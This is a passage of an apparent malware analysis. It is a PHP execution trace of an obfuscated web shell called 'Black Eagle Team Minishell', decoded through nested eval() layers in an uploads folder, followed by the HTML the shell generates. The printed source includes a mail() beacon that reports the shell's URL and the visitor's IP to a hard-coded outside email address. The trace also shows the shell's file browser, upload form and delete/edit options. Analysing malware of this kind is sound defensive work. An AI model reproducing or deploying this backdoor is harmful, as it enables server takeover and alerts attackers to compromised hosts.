\'-\');\r\n $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? \'t\' : \'x\') : (($perms & 0x0200) ? \'T\' : \'-\'));\r\n return $info;\r\n}\r\necho \'<br><center>© <span id="footer"></span> 2020 Black Eagle Team</center><br>\';\r\necho \'</body></html><!-- EOF -->\';\r\n?>\r\n<?php\r\n@ini_set(\'output_buffering\', 0);\r\n@ini_set(\'display_errors\', 0);\r\nset_time_limit(0);\r\nini_set(\'memory_limit\', \'64M\');\r\nheader(\'Content-Type: text/html; charset=UTF-8\');\r\n$to = \'alfredofernandezbutar@gmail.com\';\r\n$f31337 = "http://" . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\n$fie = "Akses $f31337 :p *IP Address : [ " . $_SERVER[\'REMOTE_ADDR\'] . " ]";\r\nmail($to, "Papa Yui Chan Dapet Shell Nih : )", $fie, "[ " . $_SERVER[\'REMOTE_ADDR\'] . " ]");\r\n?>' /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code 1 0
5 20 0 0.002953 493688 set_time_limit 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 9 1 0
5 20 1 0.002973 493752
5 20 R FALSE
5 21 0 0.002991 493720 error_reporting 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 10 1 0
5 21 1 0.003007 493760
5 21 R 22527
5 22 0 0.003020 493720 error_log 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 11 1 0
5 22 1 0.003052 493752
5 22 R TRUE
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 12 $sname = 'Black Eagle Team Minishell'
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 13 $__gcdir = 'getcwd'
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 14 $__fgetcon7s = 'file_get_contents'
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 15 $__scdir = 'scandir'
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 16 $rm__dir = 'rmdir'
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 17 $un__link = 'unlink'
5 23 0 0.003139 493720 get_magic_quotes_gpc 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 18 0
5 23 1 0.003153 493720
5 23 R FALSE
5 24 0 0.003169 493720 getcwd 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 39 0
5 24 1 0.003185 493768
5 24 R '/var/www/html/uploads'
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 39 $path = '/var/www/html/uploads'
5 25 0 0.003212 493768 str_replace 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 41 3 '\\' '/' '/var/www/html/uploads'
5 25 1 0.003230 493864
5 25 R '/var/www/html/uploads'
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 41 $path = '/var/www/html/uploads'
5 26 0 0.003256 493768 explode 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 42 2 '/' '/var/www/html/uploads'
5 26 1 0.003273 494344
5 26 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 42 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 45 $id = 0
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i = 0
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 45 $id = 1
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i = 0
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 45 $id = 2
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i = 0
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 45 $id = 3
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i = 0
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 45 $id = 4
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i = 0
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 47 $i++
5 27 0 0.003541 494272 scandir 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 114 1 '/var/www/html/uploads'
5 27 1 0.003581 494896
5 27 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'encoded.php', 5 => 'prepend.php']
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 114 $_scdir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'encoded.php', 5 => 'prepend.php']
5 28 0 0.003626 494912 is_dir 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 117 1 '/var/www/html/uploads/.'
5 28 1 0.003644 494976
5 28 R TRUE
5 29 0 0.003659 494944 is_dir 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 117 1 '/var/www/html/uploads/..'
5 29 1 0.003675 494992
5 29 R TRUE
5 30 0 0.003689 494952 is_dir 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 117 1 '/var/www/html/uploads/.htaccess'
5 30 1 0.003706 494992
5 30 R FALSE
5 31 0 0.003720 494952 is_dir 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 117 1 '/var/www/html/uploads/data'
5 31 1 0.003735 494992
5 31 R TRUE
5 32 0 0.003749 494952 is_writable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 120 1 '/var/www/html/uploads/data'
5 32 1 0.003770 494992
5 32 R TRUE
5 33 0 0.003784 494952 perms 1 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 124 1 '/var/www/html/uploads/data'
6 34 0 0.003799 494952 fileperms 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 155 1 '/var/www/html/uploads/data'
6 34 1 0.003813 494992
6 34 R 16895
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 155 $perms = 16895
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 165 $info = 'd'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 173 $info .= 'r'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 174 $info .= 'w'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 175 $info .= 'x'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 176 $info .= 'r'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 177 $info .= 'w'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 178 $info .= 'x'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 179 $info .= 'r'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 180 $info .= 'w'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 181 $info .= 'x'
5 33 1 0.003956 494992
5 33 R 'drwxrwxrwx'
5 35 0 0.003970 494952 is_writable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 125 1 '/var/www/html/uploads/data'
5 35 1 0.003988 494992
5 35 R TRUE
5 36 0 0.004001 494952 filemtime 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 127 1 '/var/www/html/uploads/data'
5 36 1 0.004016 494992
5 36 R 1676238790
5 37 0 0.004029 494896 date 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 127 2 'd-M-Y H:i' 1676238790
5 37 1 0.004094 497288
5 37 R '12-Feb-2023 16:53'
5 38 0 0.004114 497024 is_dir 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 117 1 '/var/www/html/uploads/encoded.php'
5 38 1 0.004132 497072
5 38 R FALSE
5 39 0 0.004145 497032 is_dir 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 117 1 '/var/www/html/uploads/prepend.php'
5 39 1 0.004162 497072
5 39 R FALSE
5 40 0 0.004175 497016 is_file 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 131 1 '/var/www/html/uploads/.'
5 40 1 0.004192 497040
5 40 R FALSE
5 41 0 0.004205 497008 is_file 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 131 1 '/var/www/html/uploads/..'
5 41 1 0.004221 497056
5 41 R FALSE
5 42 0 0.004233 497016 is_file 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 131 1 '/var/www/html/uploads/.htaccess'
5 42 1 0.004249 497056
5 42 R TRUE
5 43 0 0.004262 497016 filesize 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 133 1 '/var/www/html/uploads/.htaccess'
5 43 1 0.004276 497056
5 43 R 64
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 133 $size = 0.0625
5 44 0 0.004302 496960 round 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 134 2 0.0625 3
5 44 1 0.004317 497032
5 44 R 0.063
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 134 $size = 0.063
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 138 $size = '0.063 KB'
5 45 0 0.004357 497056 is_writable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 141 1 '/var/www/html/uploads/.htaccess'
5 45 1 0.004380 497096
5 45 R FALSE
5 46 0 0.004393 497056 is_readable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 143 1 '/var/www/html/uploads/.htaccess'
5 46 1 0.004409 497096
5 46 R TRUE
5 47 0 0.004423 497056 perms 1 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 145 1 '/var/www/html/uploads/.htaccess'
6 48 0 0.004437 497056 fileperms 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 155 1 '/var/www/html/uploads/.htaccess'
6 48 1 0.004451 497096
6 48 R 33188
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 155 $perms = 33188
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 161 $info = '-'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 173 $info .= 'r'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 174 $info .= 'w'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 175 $info .= '-'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 176 $info .= 'r'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 177 $info .= '-'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 178 $info .= '-'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 179 $info .= 'r'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 180 $info .= '-'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 181 $info .= '-'
5 47 1 0.004583 497096
5 47 R '-rw-r--r--'
5 49 0 0.004597 497056 is_writable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 146 1 '/var/www/html/uploads/.htaccess'
5 49 1 0.004614 497096
5 49 R FALSE
5 50 0 0.004627 497056 is_readable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 146 1 '/var/www/html/uploads/.htaccess'
5 50 1 0.004644 497096
5 50 R TRUE
5 51 0 0.004657 497056 filemtime 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 148 1 '/var/www/html/uploads/.htaccess'
5 51 1 0.004671 497096
5 51 R 1676238790
5 52 0 0.004684 497000 date 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 148 2 'd-M-Y H:i' 1676238790
5 52 1 0.004717 497328
5 52 R '12-Feb-2023 16:53'
5 53 0 0.004733 497056 is_file 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 131 1 '/var/www/html/uploads/data'
5 53 1 0.004749 497096
5 53 R FALSE
5 54 0 0.004762 497064 is_file 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 131 1 '/var/www/html/uploads/encoded.php'
5 54 1 0.004777 497112
5 54 R TRUE
5 55 0 0.004790 497072 filesize 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 133 1 '/var/www/html/uploads/encoded.php'
5 55 1 0.004804 497112
5 55 R 4809
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 133 $size = 4.6962890625
5 56 0 0.004829 496968 round 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 134 2 4.6962890625 3
5 56 1 0.004844 497040
5 56 R 4.696
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 134 $size = 4.696
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 138 $size = '4.696 KB'
5 57 0 0.004883 497072 is_writable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 141 1 '/var/www/html/uploads/encoded.php'
5 57 1 0.004900 497112
5 57 R FALSE
5 58 0 0.004913 497072 is_readable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 143 1 '/var/www/html/uploads/encoded.php'
5 58 1 0.004929 497112
5 58 R TRUE
5 59 0 0.004942 497072 perms 1 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 145 1 '/var/www/html/uploads/encoded.php'
6 60 0 0.004956 497072 fileperms 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 155 1 '/var/www/html/uploads/encoded.php'
6 60 1 0.004970 497112
6 60 R 33204
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 155 $perms = 33204
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 161 $info = '-'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 173 $info .= 'r'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 174 $info .= 'w'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 175 $info .= '-'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 176 $info .= 'r'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 177 $info .= 'w'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 178 $info .= '-'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 179 $info .= 'r'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 180 $info .= '-'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 181 $info .= '-'
5 59 1 0.005110 497112
5 59 R '-rw-rw-r--'
5 61 0 0.005124 497072 is_writable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 146 1 '/var/www/html/uploads/encoded.php'
5 61 1 0.005141 497112
5 61 R FALSE
5 62 0 0.005154 497072 is_readable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 146 1 '/var/www/html/uploads/encoded.php'
5 62 1 0.005170 497112
5 62 R TRUE
5 63 0 0.005183 497072 filemtime 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 148 1 '/var/www/html/uploads/encoded.php'
5 63 1 0.005197 497112
5 63 R 1676238790
5 64 0 0.005210 497008 date 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 148 2 'd-M-Y H:i' 1676238790
5 64 1 0.005243 497336
5 64 R '12-Feb-2023 16:53'
5 65 0 0.005258 497072 is_file 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 131 1 '/var/www/html/uploads/prepend.php'
5 65 1 0.005275 497112
5 65 R TRUE
5 66 0 0.005288 497072 filesize 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 133 1 '/var/www/html/uploads/prepend.php'
5 66 1 0.005303 497112
5 66 R 57
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 133 $size = 0.0556640625
5 67 0 0.005328 496968 round 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 134 2 0.0556640625 3
5 67 1 0.005343 497040
5 67 R 0.056
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 134 $size = 0.056
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 138 $size = '0.056 KB'
5 68 0 0.005390 497184 is_writable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 141 1 '/var/www/html/uploads/prepend.php'
5 68 1 0.005408 497224
5 68 R FALSE
5 69 0 0.005421 497184 is_readable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 143 1 '/var/www/html/uploads/prepend.php'
5 69 1 0.005438 497224
5 69 R TRUE
5 70 0 0.005451 497184 perms 1 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 145 1 '/var/www/html/uploads/prepend.php'
6 71 0 0.005465 497184 fileperms 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 155 1 '/var/www/html/uploads/prepend.php'
6 71 1 0.005480 497224
6 71 R 33261
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 155 $perms = 33261
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 161 $info = '-'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 173 $info .= 'r'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 174 $info .= 'w'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 175 $info .= 'x'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 176 $info .= 'r'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 177 $info .= '-'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 178 $info .= 'x'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 179 $info .= 'r'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 180 $info .= '-'
5 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 181 $info .= 'x'
5 70 1 0.005613 497224
5 70 R '-rwxr-xr-x'
5 72 0 0.005628 497184 is_writable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 146 1 '/var/www/html/uploads/prepend.php'
5 72 1 0.005645 497224
5 72 R FALSE
5 73 0 0.005658 497184 is_readable 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 146 1 '/var/www/html/uploads/prepend.php'
5 73 1 0.005675 497224
5 73 R TRUE
5 74 0 0.005688 497184 filemtime 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 148 1 '/var/www/html/uploads/prepend.php'
5 74 1 0.005706 497224
5 74 R 1676238790
5 75 0 0.005719 497120 date 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 148 2 'd-M-Y H:i' 1676238790
5 75 1 0.005752 497448
5 75 R '12-Feb-2023 16:53'
5 76 0 0.005769 497120 ini_set 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 188 2 'output_buffering' 0
5 76 1 0.005786 497192
5 76 R FALSE
5 77 0 0.005799 497120 ini_set 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 189 2 'display_errors' 0
5 77 1 0.005878 497192
5 77 R ''
5 78 0 0.005966 497120 set_time_limit 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 190 1 0
5 78 1 0.005984 497152
5 78 R FALSE
5 79 0 0.005997 497120 ini_set 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 191 2 'memory_limit' '64M'
5 79 1 0.006018 497224
5 79 R '128M'
5 80 0 0.006034 497120 header 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 192 1 'Content-Type: text/html; charset=UTF-8'
5 80 1 0.006053 497152
5 80 R NULL
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 193 $to = 'alfredofernandezbutar@gmail.com'
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 194 $f31337 = 'http://localhost/uploads/encoded.php'
4 A /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 195 $fie = 'Akses http://localhost/uploads/encoded.php :p *IP Address : [ 127.0.0.1 ]'
5 81 0 0.006115 497336 mail 0 /var/www/html/uploads/encoded.php(1) : eval()'d code(4) : eval()'d code(1) : eval()'d code 196 4 'alfredofernandezbutar@gmail.com' 'Papa Yui Chan Dapet Shell Nih : )' 'Akses http://localhost/uploads/encoded.php :p *IP Address : [ 127.0.0.1 ]' '[ 127.0.0.1 ]'
5 81 1 0.007071 497480
5 81 R FALSE
4 19 1 0.007107 497296
3 11 1 0.007126 451152
0.007182 366960
TRACE END [2023-02-12 19:53:36.273011]
Generated HTML code
<html><head>
<meta name="robots" content"noindex.="" nofollow"="">
<link href="https://fonts.googleapis.com/css?family=VT323" rel="stylesheet">
<link rel="icon" href="https://colorlib.com/preview/theme/satner/img/banner/home-right.png">
<title>Black Eagle Team Minishell</title>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<link href="//zerobyte-id.github.io/PHP-Backdoor/inc/m1n1.css" rel="stylesheet" type="text/css">
</head>
<body><div style="color:#ef6c00;margin-top:0;"><h1><center><img src="https://i.postimg.cc/PJYNcNJ4/BET.jpg" width="350px" height="300" style="border-radius: 100px; -moz-border-radius: 100px;"><br>Black Eagle Team Minishell</center></h1></div><table width="100%" border="0" align="center" style="margin-top:-10px;"><tbody><tr><td><font style="font-size:13px;">Path: <a style="font-size:13px;" href="?path="></a>/<a style="font-size:13px;" href="?path=/var">var</a>/<a style="font-size:13px;" href="?path=/var/www">www</a>/<a style="font-size:13px;" href="?path=/var/www/html">html</a>/<br>[ <a href="?">Home</a> ]</font></td><td align="center" width="27%"><form enctype="multipart/form-data" method="POST"><input type="file" name="file" style="color:#ef6c00;margin-bottom:4px;"><input type="submit" value="Upload"></form></td></tr><tr><td colspan="2"></td></tr><tr><td></td></tr></tbody></table><div class="table-div"></div><input id="image" type="hidden"><br><center></center><div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center"><tbody><tr class="first"> <th><center>Name</center></th><th width="12%"><center>Size</center></th><th width="10%"><center>Permissions</center></th> <th width="15%"><center>Last Update</center></th><th width="11%"><center>Options</center></th></tr><tr><td>[F] <a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td><td><center>0 KB</center></td><td><center>-rw-r--r--</center></td><td><center>12-Feb-2023 16:53</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="beneri.se_malware_analysis"><input type="hidden" name="path" value="/var/www/html/beneri.se_malware_analysis"> <input type="submit" value=">>"></form></center></td></tr><tr><td>[F] <a href="?filesrc=/var/www/html/encoded.php&path=/var/www/html">encoded.php</a></td><td><center>4.696 KB</center></td><td><center>-rw-rw-r--</center></td><td><center>12-Feb-2023 16:53</center></td><td><center><form method="POST" action="?option&path=/var/www/html"><select name="opt"><option value=""></option><option value="delete">Delete</option><option value="rename">Rename</option><option value="edit">Edit</option></select><input type="hidden" name="type" value="file"><input type="hidden" name="name" value="encoded.php"><input type="hidden" name="path" value="/var/www/html/encoded.php"> <input type="submit" value=">>"></form></center></td></tr></tbody></table></div><br><center>© <span id="footer"></span> 2020 Black Eagle Team</center><br></body></html>Original PHP code
